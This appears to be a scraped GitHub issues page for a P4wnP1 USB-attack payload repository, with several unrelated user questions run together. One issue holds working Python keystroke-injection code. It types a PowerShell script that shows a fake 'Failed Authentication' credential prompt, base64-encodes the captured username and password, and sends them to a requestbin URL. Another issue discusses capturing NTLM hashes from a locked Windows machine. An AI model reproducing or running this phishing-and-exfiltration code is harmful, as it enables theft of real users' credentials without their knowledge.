nightrang3r / p4wnp1-a.l.o.a.-payloads Goto Github PK

I'm looking for a LCD/OLED display that works with the preconfigured script. are there some that have been tested to work or do I need to buy one and hope it works?

so I don't have a sd card for the pi0W and i was going to make it in python,
its the same code but on the last line i change hidden with Normal
wondering if you can help me. i know at this is not your code so just close this issues if you don't wanna deal with it.

My python code

import pyautogui as p
import time
URL = "http://requestbin.net/r/dum96elf"
p.keyDown("win")
p.keyDown("r")
p.keyUp("win")
p.keyUp("r")
time.sleep(1)
p.typewrite("powershell\n")
time.sleep(1)
p.typewrite("$popup = \"while (`$true){`$cred = `$host.ui.promptforcredential(`'Failed Authentication`',`'`',[Environment]::UserDomainName + `\"\\`\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};if (`$cred.getnetworkcredential().password) {break :DoLoop}};`$Text = `$cred.username + `\":`\" + `$cred.getnetworkcredential().password;`$Bytes = [System.Text.Encoding]::Unicode.GetBytes(`$Text);`$EncodedText =[Convert]::ToBase64String(`$Bytes);Invoke-WebRequest -UseBasicParsing -Uri " + URL + "/`$EncodedText; rm $Env:UserProfile\\popup.ps1\"\n")
time.sleep(1)
p.typewrite("echo $popup > $Env:UserProfile\\popup.ps1\n")
time.sleep(1)
p.typewrite("powershell.exe -Exec Bypass -windowstyle Normal $Env:UserProfile\\popup.ps1\n")

the error i get

C:\Users\Jayden : The term 'C:\Users\Jayden' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:1
+ C:\Users\Jayden Robbin\popup.ps1
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Jayden:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

I have a Windows 10 Pro 10.0.19045 Build 19045 running in a Virtualbox VM (no guest tools installed).
I passed through the USB device and it gets a network (DHCP lease and so on) from the PI0w, everything fine so far.

The attack works fine if i interact with the VM, unlock it and type some random \\teststring into the explorer search bar (pretty similar to the attack in QuickDraw.sh), because now there is a network request to my P4wnP1 poisoning device.

But when i lock the screen and start the attack, i can wait for hours an do not receive a hash.

I researched a bit on the attack and found out it is from around 2016 and only works when network requests are made in the background. So i set up another VM with a DNS server and a Samba share. The Windows VM is able to request the server address from the DNS server and is able to access the Samba share via \\fakeshare.local. I mapped the network drive to a drive in Windows and locked the screen. So after this setup, i connected the PI0w again to the Windows VM and launch the attackscript QuickCreds.sh. -> i don't get no Hash.

in Win VM:

• automatic proxy detection is enabled
• firewall is on on all networks
• the SMB share is mounted with the credentials of the local windows user

like already said: the attack works fine if the screen is unlocked and i request something in the explorer search bar, there is just no NTLM hash sent when the screen is locked.

can you help me out or do you think Microsoft did mitigate this behaviour so the attack can't be exploited anymore?

Is it possible to run on raspberry pi zero 2W